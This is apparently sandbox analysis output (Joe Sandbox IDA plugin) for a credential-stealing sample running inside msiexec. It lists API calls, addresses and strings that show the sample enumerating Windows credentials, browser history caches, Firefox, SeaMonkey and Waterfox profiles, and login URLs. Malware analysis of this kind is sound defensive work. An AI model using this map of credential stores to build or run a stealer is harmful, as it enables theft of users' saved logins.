                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 115830560-3916222277

                                                                                        APIs
                                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                          • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                          • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                          • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                          • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                          • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                          • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                          • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                          • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                          • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                        • _wcslwr.MSVCRT ref: 0040C817
                                                                                          • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                          • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                        • wcslen.MSVCRT ref: 0040C82C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                        • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                        • API String ID: 2936932814-4196376884

                                                                                        APIs
                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                          • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                        • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                        • wcslen.MSVCRT ref: 0040BE06
                                                                                        • wcsncmp.MSVCRT ref: 0040BE38
                                                                                        • memset.MSVCRT ref: 0040BE91
                                                                                        • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                        • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                        • wcschr.MSVCRT ref: 0040BF24
                                                                                        • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                        • String ID:
                                                                                        • API String ID: 697348961-0
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00403CBF
                                                                                        • memset.MSVCRT ref: 00403CD4
                                                                                        • memset.MSVCRT ref: 00403CE9
                                                                                        • memset.MSVCRT ref: 00403CFE
                                                                                        • memset.MSVCRT ref: 00403D13
                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                        • memset.MSVCRT ref: 00403DDA
                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                        • String ID: Waterfox$Waterfox\Profiles
                                                                                        • API String ID: 1829478387-11920434
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00403E50
                                                                                        • memset.MSVCRT ref: 00403E65
                                                                                        • memset.MSVCRT ref: 00403E7A
                                                                                        • memset.MSVCRT ref: 00403E8F
                                                                                        • memset.MSVCRT ref: 00403EA4
                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                        • memset.MSVCRT ref: 00403F6B
                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                        • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                        • API String ID: 1829478387-2068335096
                                                                                        • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                        • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                        • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                        • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00403FE1
                                                                                        • memset.MSVCRT ref: 00403FF6
                                                                                        • memset.MSVCRT ref: 0040400B
                                                                                        • memset.MSVCRT ref: 00404020
                                                                                        • memset.MSVCRT ref: 00404035
                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                          • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                          • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                          • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                        • memset.MSVCRT ref: 004040FC
                                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                        • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                        • API String ID: 1829478387-3369679110
                                                                                        • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                        • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                        • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                        • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                        • API String ID: 3510742995-2641926074
                                                                                        • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                        • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                        • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                        • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                        • GetLastError.KERNEL32 ref: 0041847E
                                                                                        • free.MSVCRT ref: 0041848B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateErrorFileLastfree
                                                                                        • String ID: |A
                                                                                        • API String ID: 981974120-1717621600
                                                                                        • Opcode ID: 51ca5a02fc44f8a5d6c80fe755b484a3b8e8795a5c0060307af42e5ba884e769
                                                                                        • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                        • Opcode Fuzzy Hash: 51ca5a02fc44f8a5d6c80fe755b484a3b8e8795a5c0060307af42e5ba884e769
                                                                                        • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                        APIs
                                                                                          • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                          • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                          • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                        • memset.MSVCRT ref: 004033B7
                                                                                        • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                        • wcscmp.MSVCRT ref: 004033FC
                                                                                        • _wcsicmp.MSVCRT ref: 00403439
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                        • String ID: $0.@
                                                                                        • API String ID: 2758756878-1896041820
                                                                                        • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                        • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                        • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                        • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                        APIs
                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 2941347001-0
                                                                                        • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                        • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                        • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                        • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00403C09
                                                                                        • memset.MSVCRT ref: 00403C1E
                                                                                          • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                          • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                        • wcscat.MSVCRT ref: 00403C47
                                                                                          • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                          • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                        • wcscat.MSVCRT ref: 00403C70
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memsetwcscat$wcscpywcslen
                                                                                        • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                        • API String ID: 2489821370-1174173950
                                                                                        • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                        • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                        • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                        • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040A824
                                                                                        • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                        • wcscpy.MSVCRT ref: 0040A854
                                                                                        • wcscat.MSVCRT ref: 0040A86A
                                                                                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                        • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 669240632-0
                                                                                        • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                        • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                        • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                        • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                        APIs
                                                                                        • wcschr.MSVCRT ref: 00414458
                                                                                        • _snwprintf.MSVCRT ref: 0041447D
                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                        • String ID: "%s"
                                                                                        • API String ID: 1343145685-3297466227
                                                                                        • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                        • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                        • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                        • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                        • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProcProcessTimes
                                                                                        • String ID: GetProcessTimes$kernel32.dll
                                                                                        • API String ID: 1714573020-3385500049
                                                                                        • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                        • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                        • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                        • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004087D6
                                                                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                          • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                        • memset.MSVCRT ref: 00408828
                                                                                        • memset.MSVCRT ref: 00408840
                                                                                        • memset.MSVCRT ref: 00408858
                                                                                        • memset.MSVCRT ref: 00408870
                                                                                        • memset.MSVCRT ref: 00408888
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 2911713577-0
                                                                                        APIs
                                                                                        • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                        • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                        • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmp
                                                                                        • String ID: @ $SQLite format 3
                                                                                        • API String ID: 1475443563-3708268960
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmpqsort
                                                                                        • String ID: /nosort$/sort
                                                                                        • API String ID: 1579243037-1578091866
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040E60F
                                                                                        • memset.MSVCRT ref: 0040E629
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                        Strings
                                                                                        • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                        • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                        • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                        • API String ID: 3354267031-2114579845
                                                                                        APIs
                                                                                        Strings
                                                                                        • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                        • API String ID: 2221118986-1725073988
                                                                                        APIs
                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                        • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$memcmp
                                                                                        • String ID: $$8
                                                                                        • API String ID: 2808797137-435121686
                                                                                        APIs
                                                                                          • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                          • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                          • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                          • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                          • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                          • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
